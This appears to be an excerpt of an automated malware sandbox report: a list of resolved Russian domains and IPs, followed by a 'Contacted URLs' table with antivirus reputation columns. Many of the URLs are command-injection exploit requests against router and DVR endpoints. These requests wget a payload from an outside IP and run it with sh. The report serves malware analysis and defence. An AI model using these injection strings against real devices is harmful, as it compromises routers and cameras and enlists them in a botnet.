www.kece.ru 138.68.84.37 true
www.lffc.ru 159.69.115.63 true
laka.ru 62.122.170.171 true
www.kbaa.ru 88.119.171.57 true
aecf.ru 31.31.205.163 true
www.aeeb.ru 31.31.205.163 true
ccel.ru 104.21.49.253 true
www.abca.ru 90.188.239.74 true
www.eald.ru 194.58.112.165 true
ckea.ru 45.159.211.121 true
www.aabb.ru 78.108.80.121 true
kkkb.ru 5.252.116.17 true
kdbk.ru 91.189.114.22 true
eala.ru 195.24.68.6 true
dcbl.ru 62.122.170.171 true
www.kkal.ru 5.9.102.176 true
www.ccel.ru 172.67.198.22 true
www.abka.ru 185.189.15.13 true
www.aecf.ru 31.31.205.163 true
aada.ru 31.31.196.247 true
cbak.ru 31.31.205.163 true
kafl.ru 31.177.80.70 true
abca.ru 90.188.239.74 true
efab.ru 195.24.68.16 true
www.ceka.ru 62.122.170.171 true
dcae.ru 31.177.76.70 true
bfba.ru 141.8.192.170 true
www.bfba.ru 141.8.192.170 true
www.klaf.ru 62.122.170.171 true
www.afab.ru 194.58.112.174 true
feba.ru 91.228.222.241 true
akfb.ru 62.122.170.171 true
www.afce.ru 5.101.152.161 true
acec.ru 31.31.196.221 true
ekac.ru 62.122.170.171 true
efla.ru 194.58.112.165 true
www.baad.ru 194.58.112.165 true
www.laka.ru 62.122.170.171 true
ddek.ru 92.53.96.108 true
www.kaac.ru 92.53.118.39 true
elkc.ru 5.23.51.100 true
fdak.ru 5.23.50.56 true
call.ru 90.156.201.123 true
daisy.ubuntu.com 162.213.35.25 true
cbbb.ru 188.114.97.3 true
labb.ru 195.24.68.13 true
faak.ru 31.31.198.199 true
www.akkb.ru 31.177.76.145 true
www.kdfc.ru 159.69.115.63 true
aaka.ru 136.243.14.123 true
eaaa.ru 31.177.76.145 true
beca.ru 31.31.205.163 true
www.aaal.ru 87.236.16.43 true
www.clbc.ru 188.114.96.3 true
fafa.ru 62.122.170.171 true
eaek.ru 91.226.82.185 true
beke.ru 31.31.205.163 true
kckc.ru 93.95.102.237 true
www.abkc.ru 62.122.170.171 true
aedd.ru 62.122.170.171 true
www.alad.ru 92.53.96.37 true
www.aakk.ru 194.67.71.40 true
alal.ru 212.5.69.131 true
www.aedd.ru 62.122.170.171 true
www.alal.ru 212.5.69.131 true
www.leec.ru 62.122.170.171 true
aaal.ru 87.236.16.43 true
leec.ru 62.122.170.171 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.168.0.95/GponForm/diag_Form?images/ false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://192.168.0.23/language/Swedish false
  • Avira URL Cloud: safe
 unknown
http://192.168.0.124/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
    		unknown
    http://192.168.0.192/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
      		unknown
      http://192.168.0.16/GponForm/diag_Form?images/ false
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 unknown
      http://188.114.97.3/ false
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.192/language/Swedish false
      • Avira URL Cloud: safe
      		 unknown
      http://92.53.118.39/ false
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.192/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.97/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
        		unknown
        http://192.168.0.18/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
          		unknown
          http://192.168.0.173/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
            		unknown
            http://192.168.0.56/language/Swedish false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.158/language/Swedish false
            • Avira URL Cloud: safe
            		 unknown
            http://194.67.71.23/ false
            • Avira URL Cloud: safe
            		 unknown
            http://192.168.0.16/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
              		unknown
              http://192.168.0.64/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                		unknown
                http://192.168.0.64/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                • Avira URL Cloud: safe
                		 unknown
                http://192.168.0.64/language/Swedish false
                • Avira URL Cloud: safe
                		 unknown
                http://136.243.14.123/ false
                • Avira URL Cloud: safe
                		 unknown
                http://192.168.0.61/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                  		unknown
                  http://31.31.196.17/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.56/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                    		unknown
                    http://192.168.0.57/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                      		unknown
                      http://192.168.0.189/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                        		unknown
                        http://192.168.0.160/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://62.122.170.171/ false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://192.168.0.18/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                          		unknown
                          http://90.188.239.74/ false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://138.68.84.37/ false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://192.168.0.15/language/Swedish false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://192.168.0.97/GponForm/diag_Form?images/ false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://192.168.0.97/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                            		unknown
                            http://192.168.0.23/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                              		unknown
                              http://192.168.0.64/GponForm/diag_Form?images/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://159.69.115.63/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://31.31.196.247/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.18/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                		unknown
                                http://192.168.0.94/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.173/GponForm/diag_Form?images/ false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.57/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.192/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                  		unknown
                                  http://91.189.114.22/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.56/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.23/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.18/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.189/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://93.95.102.237/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.57/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                    		unknown
                                    http://194.67.71.191/ false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://195.24.68.16/ false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.94/language/Swedish false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.173/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                      		unknown
                                      http://192.168.0.93/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.15/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                        		unknown
                                        http://192.168.0.173/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                          		unknown
                                          http://192.168.0.189/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                            		unknown
                                            http://31.31.198.199/ false
                                            • Avira URL Cloud: safe
                                            		 unknown
                                            http://87.236.16.43/ false
                                            • Avira URL Cloud: safe
                                            		 unknown
                                            http://192.168.0.18/GponForm/diag_Form?images/ false
                                            • Avira URL Cloud: safe
                                            		 unknown
                                            http://192.168.0.93/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                              		unknown
                                              http://78.108.80.121/ false
                                              • Avira URL Cloud: safe
                                              		 unknown
                                              http://192.168.0.160/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                              • Avira URL Cloud: safe
                                              		 unknown
                                              http://192.168.0.95/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                		unknown
                                                http://192.168.0.124/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.160/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                  		unknown
                                                  http://31.177.76.70/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.124/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.158/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.124/GponForm/diag_Form?images/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.16/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                    		unknown
                                                    http://192.168.0.93/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.56/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                      		unknown
                                                      http://194.58.112.174/ false
                                                      • Avira URL Cloud: safe
                                                      		 unknown
                                                      http://192.168.0.61/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                        		unknown
                                                        http://192.168.0.97/language/Swedish false
                                                        • Avira URL Cloud: safe
                                                        		 unknown
                                                        http://192.168.0.56/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                          		unknown
                                                          http://192.168.0.158/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                            		unknown
                                                            http://181.214.142.230/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.18/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.124/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                              		unknown
                                                              http://192.168.0.93/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                		unknown
                                                                http://92.53.96.37/ false
                                                                • Avira URL Cloud: safe
                                                                		 unknown
                                                                http://192.168.0.64/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                • Avira URL Cloud: safe
                                                                		 unknown
                                                                http://192.168.0.57/GponForm/diag_Form?images/ false
                                                                • Avira URL Cloud: safe
                                                                		 unknown
                                                                http://192.168.0.16/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                  		unknown
                                                                  http://192.168.0.192/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                  • Avira URL Cloud: safe
                                                                  		 unknown
                                                                  http://192.168.0.173/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                                  • Avira URL Cloud: safe
                                                                  		 unknown
                                                                  http://192.168.0.23/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                    		unknown
                                                                    http://192.168.0.57/language/Swedish false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.23/GponForm/diag_Form?images/ false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://194.67.71.166/ false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.57/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.97/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                                    • Avira URL Cloud: safe
                                                                    		 unknown
                                                                    http://192.168.0.158/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                                      		unknown
                                                                      http://90.156.201.123/ false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://192.168.0.160/GponForm/diag_Form?images/ false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://31.177.80.70/ false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://45.62.194.14/ false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown
                                                                      http://192.168.0.16/language/Swedish false
                                                                      • Avira URL Cloud: safe
                                                                      		 unknown